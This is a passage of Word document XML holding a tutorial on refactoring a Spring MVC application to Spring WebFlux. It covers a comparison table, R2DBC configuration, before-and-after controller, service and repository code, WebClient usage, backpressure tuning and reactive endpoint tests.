          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports backpressure and data streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA3926"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E020B">
          <v:rect id="_x0000_i2811" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFF3CC0"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2. Key Differences between Spring MVC and Spring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gridCol w:w="2771"/>
        <w:gridCol w:w="4692"/>
      </w:tblGrid>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="45319916" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79CA525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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61C59D1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MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75291C5A"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WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="420239B0" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACACC8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rogramming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7114B08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Imperative (Blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C51D4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active (Non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="5CCD7D19" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6BF48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Concurrency Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A91700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Thread-per-request (Tomcat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4882CBB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Event loop model (Netty/WebFlux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="39B12FCF" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5245179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turn Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FA647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sponseEntity, String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68FFD59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Mono, Flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="63E3608A" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D83F60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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A81947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Limited by thread pool size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4828E4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Efficient for I/O-bound tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009546B7" w:rsidRPr="009546B7" w14:paraId="66B2EB26" w14:textId="77777777" w:rsidTr="009546B7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24FB856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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="603A3A4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ynchronous web applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DB936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High-concurrency, real-time, I/O-heavy applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78F3FFFF"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1375D">
          <v:rect id="_x0000_i2812" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0C8C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3. Step-by-Step Refactoring of Spring MVC to WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70127C5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1: Update Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038E27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lace Spring MVC dependencies with WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155709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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDE80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webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B99A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reactor-netty'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A537E2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org.springframework.boot:spring-boot-starter-data-r2dbc'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B853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mplementation 'io.r2dbc:r2dbc-postgresql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD19FA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76E60D3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5BCAE">
          <v:rect id="_x0000_i2813" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295475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2: Update Spring Boot Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE274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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95867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er:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F545B7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ort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F3A6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2dbc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F689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rl: r2dbc:postgresql://localhost:5432/testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB478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sername: user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F429D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assword: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5D32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44D81">
          <v:rect id="_x0000_i2814" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB17168"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3: Update Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558632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MVC Style (Before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE05D6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lastRenderedPageBreak/>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C25E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questMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF65DC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3577FC0D" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570D3C1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31C70F2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EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C377C" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5009695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id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141BDC0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ResponseEntity&lt;Employee&gt; getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD561E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mployee employee = employeeService.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418739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ResponseEntity.ok(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0918327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0053DBD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C248E55"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pring WebFlux Style (After)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11752F9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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AEA9F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questMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC205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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66322DE8" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E17F7D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688CF0A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ReactiveEmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F89A20" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393D693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id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FAF1B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Mono&lt;ResponseEntity&lt;Employee&gt;&gt; getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1734C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Service.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50541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p(employee -&gt; ResponseEntity.ok(employee))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7C19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defaultIfEmpty(ResponseEntity.notFound().build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B7F2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099A9DA" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4215C9E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Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF046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Flux&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64897FD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Service.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA6EC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677915B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B441C7A"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E3616">
          <v:rect id="_x0000_i2815" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0530D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4: Update Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35305F22"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raditional Service (Blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE74E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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74972AF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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665915C8" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A58CD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2418351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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB9CDA2" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2612B09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Employee findById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E85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ById(id).orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620786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06B7621C" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443B6E1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List&lt;Employee&gt; findAll() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC333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All();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044689C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1211A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0DFE72E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Reactive Service (Non-Blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589E19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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459FBB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ReactiveEmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE1D018" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F8EF0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28F5BB6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ReactiveEmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76222CAF" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18193B7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Mono&lt;Employee&gt; findById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B5B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ById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB700A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10A1F9CA" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F8876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ublic Flux&lt;Employee&gt; findAll() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F967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employeeRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED475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21D6160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2D18642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DDD4E">
          <v:rect id="_x0000_i2816" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC658C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tep 5: Update Repository Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23487767"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raditional Repository (JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E196B3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ository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203394D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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1F73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78D5BD29"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Reactive Repository (R2DBC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC6D97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ository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7992532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interface ReactiveEmployeeRepository extends ReactiveCrudRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D92C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3B43D2F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Entity Definition (Same as MVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340090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Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A962F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Table("employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145DD5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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304A37D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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DF58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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD0E02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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67344D7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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E01B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4EE497A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2FE829">
          <v:rect id="_x0000_i2817" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299E6A3"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6. Asynchronous Client Call with WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531CB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Replace RestTemplate with WebClient for non-blocking API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72519C9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WebClient Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0651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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04629A9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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1630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55D4F2BC" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657100E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Mono&lt;String&gt; fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3D236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webClientBuilder.build()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338496D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get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C71B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uri("http://localhost:8080/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2E2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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88847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bodyToMono(String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E19C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623F3833"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A12CF">
          <v:rect id="_x0000_i2818" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5BE35E"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7. Performance Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E5F6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Thread Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F76A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Use Netty for non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48476B9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6420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in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605135F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eb-application-type: reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2690B3D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active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F971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server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40644DB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max-threads: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305F85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Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7715D8E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Implement buffer limits for Flux to prevent memory overload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3017C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lastRenderedPageBreak/>
        <w:t>Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DD85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onBackpressureBuffer(50)  // Buffer size limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A310BF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subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A41F74"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06597">
          <v:rect id="_x0000_i2819" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61576521"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8. Testing Reactive Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF8178"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WebTestClient for Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6DAA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SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131FB88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class EmployeeControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7B850" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3466ACA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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA697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private WebTestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD0286" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E46B8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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0ECD3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void getEmployeeByIdTest() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E3ADA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ebTestClient.get().uri("/api/employees/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A482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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF8BA9"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pectStatus().isOk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DBDC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expectBody(Employee.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885ED4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value(employee -&gt; assertEquals("John", employee.getName()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECBE5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F11FA"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6971A61E"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3C41">
          <v:rect id="_x0000_i2820" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEC84E"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9. Advantages of WebFlux over MVC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457386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Improved Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Better for I/O-bound operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B4F4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Non-blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handles more concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD802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active Streams Support:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Efficient processing of large data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E95F4F"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Lightweight Threads:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA3411"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260C1">
          <v:rect id="_x0000_i2821" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC25E6"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10. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636CB7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Keep Services Reactive:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
